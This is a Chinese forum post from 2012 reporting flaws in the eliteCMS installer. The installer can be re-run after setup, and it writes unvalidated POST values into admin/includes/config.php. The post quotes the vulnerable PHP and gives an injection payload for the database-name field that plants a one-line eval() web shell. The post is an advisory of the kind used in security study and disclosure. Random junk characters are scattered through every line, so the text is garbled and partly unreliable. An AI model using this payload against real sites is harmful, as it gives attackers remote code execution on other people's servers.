eliteCMS的安装程序安装结束后未作锁定,导致黑客可以通过访问安装程序地址进行重复安装
2 j1 g$ ] m2 P! P0 [
" @* ?( e! t2 `# ~另外一个漏洞是安装程序可以直接写入一句话到admin/includes/config.php
9 W: s8 T$ b; g" I& H4 H7 ?我们来看代码:: Q; W5 f& K& Z0 H6 q; [8 b, F
D$ q# A8 ~5 c" l/ N8 w
..., P+ }+ |, Y# w+ X6 A
elseif ($_GET['step'] == "4") {0 ?3 W4 c% T* H. R/ ^
$file = "../admin/includes/config.php";
( B3 f6 E# V5 U) ^" d u $write = "<?php\n";
; {! l/ h, ^% ]5 d& B) P( P3 K7 j- C $write .= "/**\n";
5 Z) I4 q9 G5 k" n1 e3 \& j $write .= "*\n";
1 c- ~2 f; v# E' @0 Q" M $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
* X1 X# U7 [0 H) o...略...
8 l, G s. ]% Z9 g! o $write .= "*\n";0 e* B y' T6 {, f
$write .= "*/\n";& T/ P/ [: }( y8 a- ^
$write .= "\n";8 O! I/ b* i* @
$write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
& i( _5 C5 i) j( |' k5 q1 E $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
. ]+ y6 i1 y! U7 K! J% n' ~ $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
7 Z" r: o6 g7 f2 }/ y( Y' |3 h $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";* [# J* u4 t+ ~: W" \
$write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
+ k. b* d y8 ?5 V, R. _4 } $write .= "if (!\$connection) {\n";
+ p, m$ u& L6 c+ z! Z $write .= " die(\"Database connection failed\" .mysql_error());\n";4 i. E5 ]2 m' y5 g
$write .= " \n";7 M; J0 K, H6 J% w! ~+ I6 J E
$write .= "} \n";7 M! t$ Z1 s% o' {, f5 D" l4 [+ C
$write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";6 G( x6 P! X/ Q5 F8 ~
$write .= "if (!\$db_select) {\n";
! P: C6 B2 u) R, f# z4 |* G" X/ N5 T $write .= " die(\"Database select failed\" .mysql_error());\n";
* {* C; w5 ~' `- I $write .= " \n";& p" [9 \ K7 S( C" P( n3 B' r* v
$write .= "} \n";
6 g4 ~0 e/ M' G! w2 J5 `- E) X' s4 N $write .= "?>\n";$ Y* }$ f( J) Q' R* q
" {# @7 V+ T# F) O $writer = fopen($file, 'w');
" W& f3 C9 X6 g( L0 y/ ~7 J...* {4 |- |; k/ [& ]0 A) o! R$ W3 c
5 G4 c5 c1 j, I& D1 l
在看代码:: S- o0 O% M+ n! {2 ]
1 C$ d7 ?8 R$ ]3 o( s. q/ V$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];& p3 F" c: N1 @
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];4 p: u4 j+ e5 j" T4 T
$_SESSION['DB_USER'] = $_POST['DB_USER'];. p5 q! O" Y7 U% N& o% ?+ ^* v
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];9 @/ Y: w: I* e1 ]5 `( a
+ g- g( P& I) q# R
取值未作任何验证
4 g3 f! a$ m4 c" q+ a如果将数据库名POST数据:$ g+ G+ Y" a* t" M/ G! J
2 |" N' s7 A5 ]8 P. U3 C6 d"?><?php eval($_POST[c]);?><?php
; {+ J+ F" F/ u2 _! \7 a( C* `
9 A9 L! S9 f- W9 |将导致一句话后门写入/admin/includes/config.php& r) z1 b- ~$ M1 O$ @4 D
|
发表于 2012-11-18 13:59:27
收藏
支持
反对